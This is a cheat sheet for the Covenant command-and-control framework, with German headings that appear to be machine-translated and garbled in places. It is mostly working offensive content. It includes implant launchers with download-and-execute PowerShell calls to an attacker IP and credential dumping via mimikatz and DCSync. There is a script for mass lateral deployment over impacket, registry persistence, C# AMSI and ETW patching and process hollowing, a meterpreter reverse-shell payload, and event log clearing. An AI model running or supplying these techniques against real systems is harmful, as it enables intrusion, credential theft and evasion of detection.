Zum Inhalt

Covening C2 Framework Cheat Sheet

generieren

Überblick

Covenant ist ein .NET-basiertes Kommando- und Steuerungs- (C2)-Framework, das für rote Teamoperationen und Penetrationstests konzipiert ist. Es verfügt über eine webbasierte Schnittstelle zur Teamkooperation, unterstützt mehrere Kommunikationsprotokolle und bietet umfangreiche Post-Exploitation-Funktionen, die speziell auf Windows-Umgebungen zugeschnitten sind. NET-Baugruppen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.

Installation

Voraussetzungen

```bash

Install .NET Core SDK (3.1 or later)

wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb sudo apt update sudo apt install -y dotnet-sdk-6.0

Verify installation

dotnet --version ```_

Docker Installation (empfohlen)

```bash

Clone Covenant repository

git clone --recurse-submodules https://github.com/cobbr/Covenant.git cd Covenant/Covenant

Build Docker image

docker build -t covenant .

Run Covenant container

docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant

Access web interface

Navigate to https://localhost:7443

```_

Manuelle Installation

```bash

Clone repository

git clone --recurse-submodules https://github.com/cobbr/Covenant.git cd Covenant/Covenant

Build Covenant

dotnet build

Run Covenant

dotnet run

Access web interface at https://localhost:7443

```_

Kali Linux Installation

```bash

Install from Kali repositories

sudo apt update sudo apt install covenant

Or build from source

git clone https://github.com/cobbr/Covenant.git cd Covenant/Covenant dotnet build dotnet run ```_

Basisnutzung

Erster Setup

```bash

First-time setup

  1. Navigate to https://localhost:7443
  2. Create admin user account
  3. Accept SSL certificate warnings
  4. Complete initial configuration wizard

Default credentials (change immediately)

Username: CovenantAdmin Password: CovenantPassword ```_

Web Interface Navigation

Section Description
Dashboard Overview of active grunts and listeners
Listeners Manage communication listeners
Grunts Manage compromised hosts (agents)
Tasks Execute commands and modules
Templates Manage grunt templates and launchers
Users User management and permissions
Data Collected data and file downloads

Hörer Management

HTTP Listener erstellen

```bash

Web Interface Steps:

  1. Navigate to Listeners → Create
  2. Select HTTP Listener
  3. Configure parameters:
  4. Name: HTTP-Listener-80
  5. Bind Address: 0.0.0.0
  6. Bind Port: 80
  7. Connect Address: [Your IP]
  8. Connect Port: 80
  9. Use SSL: False

Advanced HTTP Configuration

  • Profile: DefaultHttpProfile
  • URLs: /en-us/index.html,/en-us/docs.html
  • User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) ```_

HTTPS Listener erstellen

```bash

HTTPS Listener Configuration:

  1. Navigate to Listeners → Create
  2. Select HTTP Listener
  3. Configure parameters:
  4. Name: HTTPS-Listener-443
  5. Bind Address: 0.0.0.0
  6. Bind Port: 443
  7. Connect Address: [Your IP]
  8. Connect Port: 443
  9. Use SSL: True
  10. SSL Certificate: [Upload or generate]

Generate SSL Certificate

openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes ```_

Bridge Listener (SMB)

```bash

SMB Bridge Configuration:

  1. Navigate to Listeners → Create
  2. Select Bridge Listener
  3. Configure parameters:
  4. Name: SMB-Bridge
  5. Bind Address: 0.0.0.0
  6. Bind Port: 445
  7. Connect Address: [Target IP]
  8. Connect Port: 445
  9. Profile: SMBBridgeProfile ```_

Grunt Generation und Bereitstellung

Powershell Grunt

```powershell

Generate PowerShell launcher

  1. Navigate to Launchers → PowerShell
  2. Configure parameters:
  3. Listener: HTTP-Listener-80
  4. Delay: 5
  5. Jitter: 0.1
  6. Connect Attempts: 5000
  7. Kill Date: [Future date]

Generated PowerShell command example:

powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]

Execute on target

powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')" ```_

Binärrasen

```bash

Generate binary executable

  1. Navigate to Launchers → Binary
  2. Configure parameters:
  3. Listener: HTTPS-Listener-443
  4. Output Kind: ConsoleApplication
  5. Target Framework: net40
  6. Delay: 10
  7. Jitter: 0.2

Download and execute on target

Binary will be generated as .exe file

```_

MSBuild Grunt

```xml

  1. Navigate to Launchers → MSBuild
  2. Configure listener and parameters
  3. Generated MSBuild XML file:

<![CDATA[ // Covenant grunt code here ]]>

Execute with:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml ```_

InstallUtil Grunt

```bash

InstallUtil launcher

  1. Navigate to Launchers → InstallUtil
  2. Configure parameters
  3. Execute on target:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe ```_

Grunt Management

Über uns

```bash

Basic grunt commands

help # Show available commands whoami # Get current user context hostname # Get computer name pwd # Get current directory ls # List directory contents cd [directory] # Change directory cat [file] # Read file contents download [file] # Download file from target upload [local] [remote] # Upload file to target ```_

Prozessmanagement

```bash

Process operations

ps # List running processes kill [PID] # Terminate process getpid # Get current process ID ppid # Get parent process ID

Process injection

inject [PID] [assembly] # Inject .NET assembly into process shinject [PID] [shellcode] # Inject shellcode into process ```_

Einrichtende Operationen

```bash

Credential harvesting

mimikatz # Execute Mimikatz logonpasswords # Dump logon passwords lsadump # Dump LSA secrets dcsync [domain] [user] # DCSync attack golden [options] # Golden ticket creation

Token manipulation

steal_token [PID] # Steal process token make_token [user] [pass] # Create new token rev2self # Revert to original token ```_

Spätere Bewegung

```bash

WMI execution

wmi [computer] [command] # Execute command via WMI wmiexec [computer] [user] [pass] [command] # WMI with credentials

PowerShell remoting

winrm [computer] [command] # Execute via WinRM invoke-command [computer] [scriptblock] # PowerShell remoting

Service creation

sc [computer] [service] [binary] # Create and start service ```_

Erweiterte Module

Persistenzmechanismen

```bash

Registry persistence

persist_registry [key] [value] [payload] # Registry autorun

Scheduled task persistence

persist_schtask [name] [trigger] [payload] # Scheduled task

Service persistence

persist_service [name] [payload] # Windows service

WMI persistence

persist_wmi [filter] [consumer] [payload] # WMI event subscription ```_

Vorrechte Eskalation

```bash

UAC bypass techniques

bypassuac [method] # Various UAC bypass methods eventvwr # Event Viewer UAC bypass fodhelper # FodHelper UAC bypass computerdefaults # Computer Defaults UAC bypass

Kernel exploits

ms16-032 # Secondary Logon Handle Privilege Escalation ms16-135 # Windows Kernel-Mode Drivers EoP ```_

Datenerhebung

```bash

System information

sysinfo # Detailed system information env # Environment variables netstat # Network connections arp # ARP table route # Routing table

File system operations

find [pattern] # Search for files tree [directory] # Directory tree drives # List available drives ```_

Netzwerkaktivitäten

```bash

Port scanning

portscan [target] [ports] # TCP port scan ping [target] # ICMP ping nslookup [hostname] # DNS lookup

Network shares

net share # List local shares net use # List network connections net view [computer] # List remote shares ```_

Team Collaboration

Benutzermanagement

```bash

Web Interface User Operations:

  1. Navigate to Users section
  2. Create new user accounts
  3. Assign roles and permissions:
  4. Administrator: Full access
  5. User: Limited access
  6. Listener: Listener management only ```_

Datenaustausch

```bash

File management

  1. Navigate to Data → Files
  2. View downloaded files from all grunts
  3. Share files between team members
  4. Export data for analysis

Credential sharing

  1. Navigate to Data → Credentials
  2. View harvested credentials
  3. Export credential database ```_

Berichterstattung

```bash

Generate reports

  1. Navigate to Data → Events
  2. Filter by time range and grunt
  3. Export activity logs
  4. Generate executive summary ```_

Automatisierung und Schrift

Grunt Automation Script

```csharp // C# automation script for Covenant using System; using System.Threading.Tasks; using Covenant.Models;

public class AutomationScript \\{ public async Task ExecuteAutomation(Grunt grunt) \\{ // Automated reconnaissance await grunt.ExecuteTask("whoami"); await grunt.ExecuteTask("hostname"); await grunt.ExecuteTask("sysinfo"); await grunt.ExecuteTask("ps");

    // Credential harvesting
    if (grunt.Integrity == "High")
    \\\\{
        await grunt.ExecuteTask("mimikatz");
        await grunt.ExecuteTask("logonpasswords");
    \\\\}

    // Network discovery
    await grunt.ExecuteTask("netstat");
    await grunt.ExecuteTask("arp");
    await grunt.ExecuteTask("net view");

    // Persistence
    await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}

\\} ```_

PowerShell Automation

```powershell

PowerShell script for automated grunt management

function Invoke-CovenantAutomation \\{ param( [string]\(CovenantURL = "https://localhost:7443", [string]\)Username, [string]$Password )

# Authenticate to Covenant API
$auth = @\\\\{
    UserName = $Username
    Password = $Password
\\\\}

$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"

# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}

foreach ($grunt in $grunts) \\\\{
    if ($grunt.Status -eq "Active") \\\\{
        Write-Host "Processing grunt: $($grunt.Name)"

        # Execute reconnaissance commands
        $commands = @("whoami", "hostname", "sysinfo", "ps")
        foreach ($cmd in $commands) \\\\{
            $task = @\\\\{
                Type = "GruntTask"
                GruntId = $grunt.Id
                Command = $cmd
            \\\\}

            Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
            Start-Sleep -Seconds 2
        \\\\}
    \\\\}
\\\\}

\\}

Usage

Invoke-CovenantAutomation -Username "admin" -Password "password" ```_

Batch Grunt Einsatz

```bash

!/bin/bash

Batch grunt deployment script

COVENANT_URL="https://your-covenant-server:7443" TARGETS_FILE="targets.txt"

Generate PowerShell launcher

LAUNCHER=\((curl -s -k -X GET "\)COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')

Deploy to multiple targets

while read -r target; do echo "[+] Deploying to $target"

# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""

# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""

# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"

sleep 5

done < "$TARGETS_FILE" ```_

Evasion Techniken

AMSI Bypass

```csharp // AMSI bypass in Covenant grunt [System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")] public static void BypassAMSI() \\{ try \\{ var amsiContext = Marshal.AllocHGlobal(9076); var amsiSession = Marshal.AllocHGlobal(9076); var amsiScanBuffer = Marshal.AllocHGlobal(9076);

    // AMSI bypass implementation
    var amsiDll = LoadLibrary("amsi.dll");
    var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");

    var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
    var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
    Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
    VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}

\\} ```_

ETW Bypass

```csharp // ETW bypass implementation public static void BypassETW() \\{ try \\{ var ntdll = LoadLibrary("ntdll.dll"); var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");

    var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
    var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
    Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
    VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}

\\} ```_

Prozess-Hollowing

```csharp // Process hollowing implementation public static void ProcessHollow(string targetProcess, byte[] payload) \\{ var startupInfo = new STARTUPINFO(); var processInfo = new PROCESS_INFORMATION();

// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
             ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
             ref startupInfo, out processInfo);

// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));

// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
                               payload.Length, AllocationType.Commit|AllocationType.Reserve,
                               MemoryProtection.ExecuteReadWrite);

WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);

// Resume execution
ResumeThread(processInfo.hThread);

\\} ```_

Integration mit anderen Tools

Metasploit Integration

```bash

Use Covenant with Metasploit

Generate Metasploit payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe

Upload via Covenant grunt

upload meterpreter.exe C:\Windows\Temp\update.exe

Execute Metasploit payload

execute C:\Windows\Temp\update.exe

Use Metasploit for post-exploitation

msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 443 run ```_

BlutHound Integration

```bash

Collect BloodHound data via Covenant

Upload SharpHound to target

upload SharpHound.exe C:\Windows\Temp\collector.exe

Run BloodHound collection

execute C:\Windows\Temp\collector.exe -c All -d domain.local

Download collected data

download C:\Windows\Temp*BloodHound.zip

Import into BloodHound

neo4j start ./BloodHound --no-sandbox

Import downloaded zip file

```_

CrackMapExec Integration

```bash

Use CME for initial access, Covenant for persistence

Initial compromise via CME

crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""

Verify Covenant grunt connection

Use Covenant for further exploitation

```_

Operationelle Sicherheit

Kommunikationssicherheit

```bash

Use domain fronting

  1. Configure CloudFlare or similar CDN
  2. Set up domain fronting rules
  3. Configure Covenant listener with fronted domain
  4. Use legitimate-looking URLs and user agents

Certificate management

Use legitimate SSL certificates

certbot certonly --standalone -d your-domain.com

Configure Covenant with legitimate certificate

```_

Verkehrsobfukation

```bash

Custom HTTP profiles

  1. Navigate to Profiles → HTTP
  2. Create custom profile mimicking legitimate traffic:
  3. User agents from target environment
  4. URLs matching legitimate applications
  5. Headers matching expected traffic

Malleable C2 profiles

Create custom communication patterns

Mimic legitimate applications (Office 365, Google, etc.)

```_

Anti-Forensik

```bash

Event log clearing

wevtutil cl System wevtutil cl Security wevtutil cl Application

Timestomping

timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe

Memory cleanup

Implement memory wiping in custom tasks

Use process migration to avoid memory analysis

```_

Fehlerbehebung

Gemeinsame Themen

```bash

Grunt not connecting

  1. Check firewall rules on Covenant server
  2. Verify listener configuration
  3. Test network connectivity
  4. Check antivirus interference

SSL certificate issues

Generate new certificate

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Performance issues

Increase grunt delay and jitter

Use multiple listeners for load balancing

Optimize task execution frequency

```_

Debug Mode

```bash

Enable debug logging

  1. Navigate to Administration → Settings
  2. Enable debug logging
  3. Check logs in Data → Events
  4. Monitor grunt communication

Network troubleshooting

Use Wireshark to analyze traffic

Check for network filtering

Verify DNS resolution

```_

Datenbankprobleme

```bash

Reset Covenant database

cd Covenant/Covenant rm -rf Data/covenant.db dotnet run

Backup database

cp Data/covenant.db Data/covenant.db.backup

Restore database

cp Data/covenant.db.backup Data/covenant.db ```_

Best Practices

Betriebsplanung

  1. ** Voreinstellung**: Hörer und Profile vor dem Eingriff konfigurieren
  2. Teamkoordination: Rollenbasierte Zugriffskontrolle für Teammitglieder
  3. ** Kommunikationsprotokolle*: klare Kommunikationskanäle einrichten
  4. Datenhandling: Implementierung sicherer Datenerfassungs- und Speicherverfahren
  5. **Cleanup-Verfahren*: Plan zur Entfernung von Artefakten und Reinigung

Sicherheitsüberlegungen

```bash

Secure Covenant deployment

Use strong authentication

Enable HTTPS with valid certificates

Implement network segmentation

Regular security updates

Grunt management

Use unique grunt names

Implement kill dates

Regular grunt rotation

Secure communication channels

```_

Dokumentation

```bash

Maintain operation logs

Document all activities

Track compromised systems

Record credential harvesting

Generate executive reports

```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Covenant C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *